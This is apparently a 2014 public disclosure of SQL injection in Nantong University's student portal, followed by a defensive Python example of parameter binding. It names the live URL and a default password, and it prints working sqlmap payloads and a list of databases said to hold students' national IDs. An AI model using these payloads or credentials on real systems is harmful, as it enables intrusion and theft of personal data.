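2014-12-18: Details reported to the vendor; awaiting vendor handling
2014-12-23: The vendor has chosen to ignore the vulnerability; details disclosed to the public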
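My goodness, that scared me. I only went on to look up my own information and ended up finding an injection point, and there seems to be rather a lot in there...
Nantong University information service platform: http://my.ntu.edu.cn/ Enter any student ID with the password 888888. After logging in, click "Computer Rank Examination registration information query" on the left; that input box is injectable. Capture the request, feed it to sqlmap, and it finds: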
current user is DBA: True
There seems to be quite a lot in there...
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: xh
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: xh=1314012162' AND 5675=5675 AND 'fCAW'='fCAW

    Type: UNION query
    Title: Generic UNION query (NULL) - 28 columns
    Payload: xh=1314012162' UNION ALL SELECT NULL,NULL,NULL,CHAR(58)+CHAR(108)+CHAR(107)+CHAR(121)+CHAR(58)+CHAR(73)+CHAR(97)+CHAR(113)+CHAR(68)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(77)+CHAR(120)+CHAR(66)+CHAR(58)+CHAR(119)+CHAR(101)+CHAR(116)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: xh=1314012162'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: xh=1314012162' WAITFOR DELAY '0:0:5'--
---
[13:38:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:38:30] [INFO] fetching database names
available databases [51]:
[*] CarAccessories
[*] card
[*] DataMing
[*] db_19
[*] db_B2CShop
[*] dfdffddf
[*] EduManager
[*] exam
[*] examSys
[*] GradeSys
[*] india
[*] jadedatabases
[*] jlxt
[*] jobSubmit
[*] jsxx
[*] LoginDate
[*] master
[*] model
[*] msdb
[*] mvcdb
[*] MyHotelManager
[*] newssystem
[*] NTU
[*] NTUINFO
[*] ntusso
[*] Photography
[*] pksrd
[*] pksrd2
[*] qkgl
[*] ReportServer
[*] ReportServerTempDB
[*] ryxx
[*] SampleDB
[*] SHTFTS
[*] SingleSignOn
[*] SQL02_TEMP
[*] sqsj
[*] SSO
[*] stock
[*] Tea
[*] tempdb
[*] test
[*] test1123
[*] TestExcelImp
[*] testLogin
[*] TestYKT
[*] user_login
[*] xsxx
[*] yjsgl_new
[*] ykt
[*] yysd
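It contains classes, student IDs, national ID numbers and so on; in any case, a lot...
Same as above
Don't know
Severity: no impact (ignored by vendor)
Ignored at: 2014-12-23 14:52
None yet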
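The root cause behind the `xh` finding above, shown as an added example that is not part of the original report or the platform's code: a lookup that concatenates the POST value into SQL, beside one that validates and binds it. SQLite stands in for the SQL Server back end so the block runs offline; the table, column names, sample rows and student-ID format are assumptions.

```python
import re
import sqlite3

# Payload exactly as it appears in the sqlmap output above.
PAGE_PAYLOAD = "1314012162' AND 5675=5675 AND 'fCAW'='fCAW"
XH_FORMAT = re.compile(r"\d{6,12}")  # assumed student-ID format

def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE exam_signup (xh TEXT, name TEXT, exam TEXT)")
    db.executemany("INSERT INTO exam_signup VALUES (?, ?, ?)",
                   [("1314012162", "student-a", "NCRE-2"),
                    ("1314012163", "student-b", "NCRE-1")])
    return db

def lookup_concat(db, xh):
    # Vulnerable pattern: the POST value is spliced into the SQL text, so a
    # quote in xh closes the string literal and the rest is parsed as SQL.
    sql = "SELECT xh, name, exam FROM exam_signup WHERE xh = '" + xh + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, xh, validate=True):
    # Hardened pattern: reject values that are not a student ID, then bind
    # the value as a parameter so it is only ever compared as data.
    if validate and not XH_FORMAT.fullmatch(xh):
        return []
    sql = "SELECT xh, name, exam FROM exam_signup WHERE xh = ?"
    return db.execute(sql, (xh,)).fetchall()

def treats_input_as_sql(lookup):
    # Regression check: if the payload returns the same row as the plain ID,
    # the injected AND clauses were executed instead of compared as text.
    db = make_db()
    plain = lookup(db, "1314012162")
    return bool(plain) and lookup(db, PAGE_PAYLOAD) == plain

if __name__ == "__main__":
    print("concatenated:", treats_input_as_sql(lookup_concat))
    print("bound:       ", treats_input_as_sql(lookup_bound))
    print("bound, no validation:",
          treats_input_as_sql(lambda db, xh: lookup_bound(db, xh, False)))
```

Binding closes the injection itself; the `current user is DBA: True` line is a separate finding, and the web application's database login should be a low-privilege account limited to the tables this query needs.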